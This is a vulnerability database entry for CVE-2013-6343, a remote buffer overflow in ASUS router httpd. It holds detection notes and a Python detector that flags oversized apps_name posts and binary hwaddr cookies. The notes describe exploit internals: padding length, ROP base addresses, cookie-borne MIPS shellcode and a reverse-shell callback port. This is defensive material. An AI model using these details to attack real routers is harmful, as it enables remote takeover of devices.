CVE-2013-6343
Published 2014-01-22
Priority P2 · 62 · CVSS 2.0: 10.0 (critical) · AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit available · EPSS 9.71% (94.9th percentile)
Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary code via the (1) apps_name or (2) apps_flag parameter to APP_Installation.asp.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| asus | rt-ac66u_firmware | — | — |
| asus | rt-n56u_firmware | — | — |
| asus | tm-ac1900_firmware | — | — |
Detection & IOCs (extracted from sources)
- Detect HTTP POST requests to /APP_Installation.asp with an oversized apps_name parameter (>109 bytes); the exploit uses 109 bytes of junk followed by ROP chain data.
- Alert on HTTP POST to /APP_Installation.asp containing both apps_name and apps_flag parameters, especially with apps_flag=sdb1 and a large apps_name value.
- Inspect the Cookie header for an hwaddr field with binary/non-printable content exceeding 35 bytes; the exploit embeds 200-byte MIPS shellcode in the hwaddr cookie value.
- Monitor for outbound TCP connections to port 31337 from ASUS RT-N56U/RT-AC66U devices, which indicates successful reverse shell execution.
- Fingerprint the target by checking for 'RT-N56U' in the HTTP server banner response to a HEAD / HTTP/1.1 request.
- The exploit was tested specifically against firmware version 3.0.0.4.374_979; other firmware versions may also be vulnerable but were not confirmed.
- The ROP chain uses hardcoded base addresses for ld_uClibc (0x2aaa8000) and libc (0x2ab5f000) in the httpd address space; these offsets are specific to the tested firmware and may differ on other builds.
- The Stage 3 reverse shell shellcode hardcodes the callback IP 192.168.1.177 and port 31337; real-world attackers would modify these values.
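Detection logic for the HTTP-side indicators listed above (an oversized apps_name posted to /APP_Installation.asp, and a binary hwaddr cookie), written as an added example; it is not code from the page's sources, and the sample requests and the `router` host are constructed.

```python
from urllib.parse import parse_qs

# Thresholds from the detection notes: the PoC pads apps_name with 109 bytes
# before the ROP chain and stores ~200 bytes of shellcode in the hwaddr cookie.
APPS_NAME_MAX = 109
HWADDR_MAX = 35

def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _ = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip()
    return method.decode("latin-1"), path.decode("latin-1"), headers, body

def cookie_field(cookie: bytes, name: bytes):
    """Return the raw value of one cookie, or None if it is absent."""
    for part in cookie.split(b";"):
        key, _, value = part.strip().partition(b"=")
        if key == name:
            return value
    return None

def analyze(raw: bytes) -> list:
    """Return alert strings for one request; an empty list means no match."""
    method, path, headers, body = parse_request(raw)
    alerts = []
    if method == "POST" and path.split("?")[0] == "/APP_Installation.asp":
        # latin-1 keeps a 1:1 byte-to-char mapping, so len() counts bytes
        params = parse_qs(body.decode("latin-1"), keep_blank_values=True)
        apps_name = params.get("apps_name", [""])[0]
        if len(apps_name) > APPS_NAME_MAX:
            flag = params.get("apps_flag", ["<absent>"])[0]
            alerts.append(f"oversized apps_name ({len(apps_name)} bytes, apps_flag={flag})")
    hwaddr = cookie_field(headers.get("cookie", b""), b"hwaddr")
    if (hwaddr is not None and len(hwaddr) > HWADDR_MAX
            and any(c < 0x20 or c > 0x7E for c in hwaddr)):
        alerts.append(f"binary hwaddr cookie ({len(hwaddr)} bytes)")
    return alerts

# Constructed sample requests (not real captures).
BENIGN = (b"POST /APP_Installation.asp HTTP/1.1\r\nHost: router\r\n"
          b"Cookie: hwaddr=00:11:22:33:44:55\r\n\r\napps_name=myapp&apps_flag=sdb1")
MALICIOUS = (b"POST /APP_Installation.asp HTTP/1.1\r\nHost: router\r\n"
             b"Cookie: hwaddr=" + b"\xcc" * 40 + b"\r\n\r\n"
             b"apps_name=" + b"A" * 109 + b"\x01\x02\x03\x04" + b"&apps_flag=sdb1")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, analyze(req) or "no alerts")
```

The body is percent-decoded before the length check, so an attacker URL-encoding the padding does not shrink the measured size; the port-31337 egress indicator is a network-flow check and is out of scope here.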
References
- http://infosec42.blogspot.com/2014/01/exploit-asus-rt-n56u-remote-root-shell.html
- http://osvdb.org/102267
- http://www.exploit-db.com/exploits/31033
- http://www.securityfocus.com/bid/65046
- https://support.t-mobile.com/docs/DOC-21994